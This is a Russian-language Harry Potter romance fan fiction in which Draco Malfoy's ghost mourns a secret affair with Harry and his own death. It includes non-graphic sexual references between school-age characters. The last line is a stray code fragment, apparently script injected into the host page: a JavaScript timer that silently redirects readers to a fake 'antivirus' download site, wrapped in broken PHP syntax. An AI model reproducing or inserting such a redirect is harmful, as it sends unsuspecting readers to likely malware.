Планета любви

Автор: Кот Бегемот
Рейтинг:  R
Pairing:  ???/???
Жанр:  Darkfic, drama
Предупреждение: смерть персонажа
Summary: Ночь и страх, боль и воспоминания…
Размещение: с разрешения виновника торжества (см. ниже)
От автора: огромное спасибо Иллении за ослепительную и добрую историю с "Источником". Дай тебе Мерлин вдохновения и огромной изящной музы. Прости за запоздалый подарок…

Ночь… Я больше всего ненавижу её. Странные тени мрачного замка оживают и своим присутствием напоминают мне о боли. Боли, которая возвращает меня в прошлое. Прошлое, которое навечно сковала меня невидимыми наручниками и лишило всякой надежды на настоящее и будущее. Будущее, которое с противной закономерностью повторяется день за днём, ночь за ночью…

"Страх перед именем усиливает страх перед его владельцем" – кажется, так Грейнджер говорила, когда мне было всего двенадцать. Никогда бы не подумал, что способен пугаться собственного имени – я вообще редко о нём вспоминаю. Да и зачем? Какой смысл? Я – часть прошлого, как и все эти дурацкие кубки и знамёна, пылящиеся на полках Хогвардса. Кому они нужны? Разве что первогодкам, не читавшим "Историю…" и разевающим рты на поросшие мхом и временем раритеты. Бестолковая малышня тычет пальцами в стекло и глупыми щенячьими возгласами произносит имена колдунов, которые удостоились чести быть увековеченными. Иногда я проплываю мимо и затыкаю уши, чтобы не слышать, как студенты произносят ЕГО имя. Имя, которое стало моим прошлым. Без будущего… Как ночь без дня… И она никогда не закончится. Иногда мне кажется, будто от этого можно сойти с ума, но даже таракану из Снейповского подземелья известно, что такое счастье никогда не свалится привидению на голову. Жалкое подобие жизни – всё, чем я обладаю. И ещё воспоминания. Воспоминания, которые делают меня счастливым на минуту и несчастным навсегда.

Помнишь? Нет, ты не помнишь! Я тебе никогда не рассказывал, как тайком застукал тебя в туалете Плаксивой Миртл за просмотром одного пикантного журнальчика. Знал бы ты, как мне хотелось растрепать по всему Хогвардсу о твоих ночных кружках "умелые ручки". Многие студентки (студенты? ну, думаю, и они тоже) раскошелились бы на пару-тройку галеонов, лишь бы подсмотреть, чем таким занимается их воображаемый змей-искуситель. И как он каждый раз при сладком выпуске кричит моё имя. Клянусь – мадам Помфрей долго пытала меня, где я умудрился заработать здоровенную шишку. Ну не признаваться же в том, что её пациент расшиб лоб, подглядывая за тобой. Это уже потом я привык и даже обижался, когда ты бился в молчаливом оргазме. Для меня всё происходящее было какой-то новой игрой. Зависая в Астрономической Башне с очередной поклонницей, я нетерпеливо кусал губы и постоянно смотрел на часы, раздражённо ворча, когда сюськи-пуськи с девицами затягивались. Не то, чтобы мне нравилось за тобой подглядывать. То есть, нравилось, конечно, но не в этом соль: каждая последующая ночь, когда я подсматривал в щёлку, была для меня ещё одним хрупким доказательством уверенности. Уверенности, что ты хочешь меня.

- Привет, Миртл!

- Опять???

- По-моему, тебе пора привыкнуть.

- Я-то думала, с отъездом твоего дружка вновь смогу поселиться в своём туалете и спокойно плакать. Ан, нет – всё вы, мальчишки, одинаковые…

Иногда в твоё отсутствие я приходил сюда и, обхватив руками голову, часами думал о странности своего чувства. Этот дикий коктейль из желаний высмеять тебя, ударить побольнее и прильнуть к тебе, разбавленный страхом перед ответным шагом и тем, что ты оттолкнёшь меня, разрывал тонкие ленточки переплетённого паутиной эмоций разума. Как свеча, к пламени которой постоянно слетаются бабочки – казалось, ещё мгновение, и жадные языки огня безжалостно поглотят их…

О! Это подземелье я запомнил на всю жизнь. И не только? Помню, как крался за тобой, стараясь заглушить биение моего сердца, шёпотом  проклиная отчаянный пульс своего безумства. На секунду ты исчез и как призрак появился за моей спиной. Холодный и яростный взгляд. Как это по-малфоевски!

- Какого чёрта тебе нужно?..

Несколько мгновений висит опустошающая мои силы тишина. Разум и отчаяние встретились в решающей схватке – мгновение, ещё мгновение. Стрелка циферблата моего разума громким стуком отбивает последние секунды вечного круга.

- Иду за тобой.

- Зачем?

Новый круг. Мгновение, ещё мгновение.

- Хочу быть рядом.

- Зачем?

Ещё один круг. И вдруг что-то поднялось в моей груди – что-то яркое и ослепительное. Сродни рассвету после долгой зимней ночи.

- Ты меня любишь. И я хочу ответить тебе.

- Зачем?

Время остановилось, и только пульс страсти в моих юношеских венах сладко напоминали о жизни. Борясь с желанием броситься к тебе или вот просто так разреветься на месте, молчу. Молчу и ухожу, молясь, чтобы ты не слышал громких слёз тающего сердца. Кап… кап… Робкие шаги и неуверенный голос позади:

- Постой.

Я знал, что это всего лишь страсть двух частей одной плоти. Животный секс чёрно-белого цвета. Безумство разгорячённых тел, жадность страсти и хриплые стоны сладких брызг нашей сущности. А потом мы уходили, чтобы через несколько часов опять предаться нашим фантазиям. Ты никогда не говорил, что любишь меня, а я боялся спросить. Боялся услышать ответ и быть уничтоженным. Боялся, что наступит ночь, и темнота поглотит мою душу. Счастье в неведении, кажется так?

А здесь я умер. Вспышка ядовитого зелёного цвета и хихикающий смешок глупой смерти. И возможность выбора между пустотой и светом. Я ждал тебя долго, захлёбываясь от мучительных слёз неизбежности. Ты прижался к моему телу, пытаясь согреть холодное лицо своими тёплыми капельками, рвущимися из глубин твоих чувств.

- ТЫ НЕ МОГ УМЕРЕТЬ!

Мог. Два слова и забвение.

- Я ЛЮБЛЮ ТЕБЯ, СЛЫШИШЬ?

Слышу. Слышу и плачу. Мраморные бусинки падают на пол, но ты не замечаешь.

- Я ЛЮБЛЮ ТЕБЯ!

Пустота и свет смеются надо мной, торопя с выбором.

- ЛЮБЛЮ, ВЕРНИСЬ, НУ ПОЖАЛУЙСТА!

Ты целовал моё тело, а моя душа чувствовала жар твоих губ.

- Вернись… ВЕРНИСЬ!

Свет исчез, и пустота накрыла меня леденящей душу тишиной. Я сделал выбор. Страх, трусость? Твои слова?

Боль и тоска. У меня есть только воспоминания и нет будущего. Призрак прошлого, который испугался смерти и разлуки. Что я мог тебе предложить? Компанию серебристого облачка, размышляющего на тему смерти? Дружбу призрака?

Я не виню тебя. Никто не винит тебя – твоя жизнь продолжается, и ты не обязан связывать моё прошлое со своим будущим. Спасибо, что навестил меня прошлой весной – прости, что наговорили друг другу глупостей и прятали глаза. Ты промолчал, но я знаю, что у вас с Бэддоком всё нормально… Ты просто вспоминай обо мне иногда, ладно? Это согреет меня в просторах вечности моей ночи. Ночи, которую я ненавижу…

- Смотрите, "Гарри Поттер – Ловец Гриффиндора".

Яркая вспышка в моём сознании. Робкий рассвет в темноте. Гарри Поттер и Драко Малфой. Земля и Луна. И я, слизеринское привидение Хогвардса, как спутник, буду вечно вращаться вокруг огромной планеты моей любви, Гарри Поттера, который больше мне не принадлежит…

Ночь… я ненавижу ночь…

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>